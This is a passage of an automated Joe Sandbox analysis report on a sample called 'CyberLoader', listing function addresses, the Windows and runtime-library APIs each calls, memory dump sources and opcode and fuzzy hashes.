                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: bb7cbb22c6d490c891aca3c9640e76242b52ddf877dde7b6f5aabf6a82692ec6
                                                  • Instruction ID: d2bb0f8555b3db8c68ae8d3ce325ffc4b12f14f79fdb535963a5b886630b87a0
                                                  • Opcode Fuzzy Hash: bb7cbb22c6d490c891aca3c9640e76242b52ddf877dde7b6f5aabf6a82692ec6
                                                  • Instruction Fuzzy Hash: 0641B6718606559ADF20EB60CC55BEA73A8AF50300F0480EAE54EA3093DFB45EE8DF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00271E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00271E05
                                                    • Part of subcall function 00273B3D: __EH_prolog.LIBCMT ref: 00273B42
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: bb9a847837c1bdd87f7c455b0cfab83c3a163305d81e1b1af0c81fcd930ea2b7
                                                  • Instruction ID: c64740d7e4adb3fdbbe904527c71b82cf9bc279c712170b55ed270f648ed25bf
                                                  • Opcode Fuzzy Hash: bb9a847837c1bdd87f7c455b0cfab83c3a163305d81e1b1af0c81fcd930ea2b7
                                                  • Instruction Fuzzy Hash: B92139729251099FCF15EF99D9419EEBBF6BF58300B1040AEE849A7291CB325E30CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0028A7C8
                                                    • Part of subcall function 00271380: __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00271380: new.LIBCMT ref: 002713FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 4f7a8b61c6d2aa9ad9d6f7ca09bf4994c84425bf4dac1a7581af476f970d6fbd
                                                  • Instruction ID: 420098dc7c3f1f8875910916d150b743659e13a1029238ba748e20169ee15a0c
                                                  • Opcode Fuzzy Hash: 4f7a8b61c6d2aa9ad9d6f7ca09bf4994c84425bf4dac1a7581af476f970d6fbd
                                                  • Instruction Fuzzy Hash: FF216B75C15249EACF14EF98C9429EEB7B4AF19300F0044AAE809A7242DB356E26DF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002792E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 4be9559173bd21dbfb0de3a74b52cfd4b31f172fbb47dbcee27d05ef839cb446
                                                  • Instruction ID: 83e5302644ef0174711409790344cf7eef36b2e55c9304daa322f93fb8724b96
                                                  • Opcode Fuzzy Hash: 4be9559173bd21dbfb0de3a74b52cfd4b31f172fbb47dbcee27d05ef839cb446
                                                  • Instruction Fuzzy Hash: 2B1182739206299BCB22AEA8CC419DEB735AF88750F018159F818B7251CA348D708BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                  • Instruction ID: 4b4d5cc4d79ea3f9c6579fc81ce2e6f8c0fbcb223377e34e0034fa4ddf100a3a
                                                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                                  • Instruction Fuzzy Hash: 7EF03C319257069FDB30DE75C945A1AB7E8EB55330F20C91AE49EC6690EB70D8A0CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00275BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00275BDC
                                                    • Part of subcall function 0027B07D: __EH_prolog.LIBCMT ref: 0027B082
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: c22e3579373757feab87f70e805879a67da24aad676e75a9e659f2883bdf749b
                                                  • Instruction ID: be21bc9dac915b1d7d8b6397619dc20d84a3d5a203cf98be14253f5406981bc7
                                                  • Opcode Fuzzy Hash: c22e3579373757feab87f70e805879a67da24aad676e75a9e659f2883bdf749b
                                                  • Instruction Fuzzy Hash: AB016D34A29694DBC725F7A8C1563DDF7A49F19700F40919DA89E53283CBB41B18CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00298518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 94550a7e57d2b02cbecbbf4397c06014fc73278e8833637828937ccea5a65ee4
                                                  • Instruction ID: d6bbc4fa5e108381c941ccfd8dc17de7da02473e513fa6470def872c93d328d1
                                                  • Opcode Fuzzy Hash: 94550a7e57d2b02cbecbbf4397c06014fc73278e8833637828937ccea5a65ee4
                                                  • Instruction Fuzzy Hash: 49E0E5215741229BEF312E69AC05B5A37CC9B433B0F9F0210AC18E2080CE60CC2449E5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002796D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0027968F,?,?,?,?,002A1FA1,000000FF), ref: 002796EB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: 2a647d672a3ac92e6d1d9b0d41b3b5759a6433de7be6bad0e2f7bbc3e1bca1d9
                                                  • Instruction ID: edb133fb52c5b4c9e16731f9e572cbe81859485e443e5ab073b53073c298ff07
                                                  • Opcode Fuzzy Hash: 2a647d672a3ac92e6d1d9b0d41b3b5759a6433de7be6bad0e2f7bbc3e1bca1d9
                                                  • Instruction Fuzzy Hash: F4F05E705A6B068FDB308E24D588792B7E99B13725F04DB1E90EB438A0D771A8AD8F10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A4F5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: d575941c67a483d712cff2b329f08ded67b91884ea498804241faa5ddc300edb
                                                  • Instruction ID: d14287ba611cf09467cc50f13c997b3e2daf9e3b3a9f05a1dc1ffabeb3651219
                                                  • Opcode Fuzzy Hash: d575941c67a483d712cff2b329f08ded67b91884ea498804241faa5ddc300edb
                                                  • Instruction Fuzzy Hash: 32F0E931419380ABCB225B7848047CFBB90AF46331F04CA4DF1FD02191C2B514A59B23
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 002806B1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ExecutionStateThread
                                                  • String ID:
                                                  • API String ID: 2211380416-0
                                                  • Opcode ID: f3b08053042cb623072b45a866748d2be904e0b119961daecda8c2aabcf6db55
                                                  • Instruction ID: 626c505430763b90e1592d4db727a26a59d2d93361ebff7fdac5d419b4ea202b
                                                  • Opcode Fuzzy Hash: f3b08053042cb623072b45a866748d2be904e0b119961daecda8c2aabcf6db55
                                                  • Instruction Fuzzy Hash: ADD0C22873212127C6323724A88EBFF1A0E0FC3750F080061B00D135C38E5608FA4BA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00289D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GdipAlloc.GDIPLUS(00000010), ref: 00289D81
                                                    • Part of subcall function 00289B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00289B30
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                  • String ID:
                                                  • API String ID: 1915507550-0
                                                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                  • Instruction ID: 17de973ae142eca389f9a2eb745f0f64d2c63a750e142b3dca98113492ad717a
                                                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                  • Instruction Fuzzy Hash: D8D0A73423620DBEDF40BE708C02A7A7BE8EB00300F044035BC08861C1ED71DE70A765
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00279989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileType.KERNELBASE(000000FF,00279887), ref: 00279995
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID:
                                                  • API String ID: 3081899298-0
                                                  • Opcode ID: 4820093f2ede3e96aff4056a2695da8393e67ebe8a27647f758299607cc1eb83
                                                  • Instruction ID: e0715cd5cbcefea6709284618afdaa6b6bd0267f45bd75c143b08f460ca53d12
                                                  • Opcode Fuzzy Hash: 4820093f2ede3e96aff4056a2695da8393e67ebe8a27647f758299607cc1eb83
                                                  • Instruction Fuzzy Hash: 69D01231031342D69F218E345D09099B751DB83376B38C6E8E129C40A1D733C893F541
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0028D43F
                                                    • Part of subcall function 0028AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028AC85
                                                    • Part of subcall function 0028AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028AC96
                                                    • Part of subcall function 0028AC74: IsDialogMessageW.USER32(00010464,?), ref: 0028ACAA
                                                    • Part of subcall function 0028AC74: TranslateMessage.USER32(?), ref: 0028ACB8
                                                    • Part of subcall function 0028AC74: DispatchMessageW.USER32(?), ref: 0028ACC2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                  • String ID:
                                                  • API String ID: 897784432-0
                                                  • Opcode ID: 33e860e104923e1dcf35a40d7697f7fb8f532243cb912eb7236efabfb0390e4d
                                                  • Instruction ID: 5f898e20ec4dea326508111c0796f8bf525bd3a310375386360940ad99dfbf02
                                                  • Opcode Fuzzy Hash: 33e860e104923e1dcf35a40d7697f7fb8f532243cb912eb7236efabfb0390e4d
                                                  • Instruction Fuzzy Hash: 88D09E31154300ABD6112B51DE07F0F7AE6AB98B05F004655B348740F28A729D30DF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: f38440f790cad1689d98aa8ffbe96dff61fb1d3688b627d93e7bbbb33a57bbb7
                                                  • Instruction ID: ca208d059f1e83c1f084b71fe4b92ca91eb736c70169c8569ba4f253e81083d2
                                                  • Opcode Fuzzy Hash: f38440f790cad1689d98aa8ffbe96dff61fb1d3688b627d93e7bbbb33a57bbb7
                                                  • Instruction Fuzzy Hash: 0BB0129D27E502BD310871146C46D3B031CD4D3B13330801BF10DD01C2D8809C3D5B31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8496e05f94b90a676d9ff57cbe9a85292cee44af49eabd9630a4222d2dbbf545
                                                  • Instruction ID: 54d28e785b99dbaa30e986242bdd194e6472364254e79e9ec70ce6375a89617a
                                                  • Opcode Fuzzy Hash: 8496e05f94b90a676d9ff57cbe9a85292cee44af49eabd9630a4222d2dbbf545
                                                  • Instruction Fuzzy Hash: F1B0129927E401BD310871146C06D36032CC4D3B12330C01BF50DD02C2D8809C3E5A31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 4b810529a94a85d668db718716299c8b976ddc974f68dc35526f39660bf80a90
                                                  • Instruction ID: 72aa483fcbdc138f85fbe23c2378d1378dffe948ccf97662e466f536468fb6d2
                                                  • Opcode Fuzzy Hash: 4b810529a94a85d668db718716299c8b976ddc974f68dc35526f39660bf80a90
                                                  • Instruction Fuzzy Hash: BCB0129D27E701BD310831106C56C3B031CC4D3B13330852BF10DE00C2D8809C7D9931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
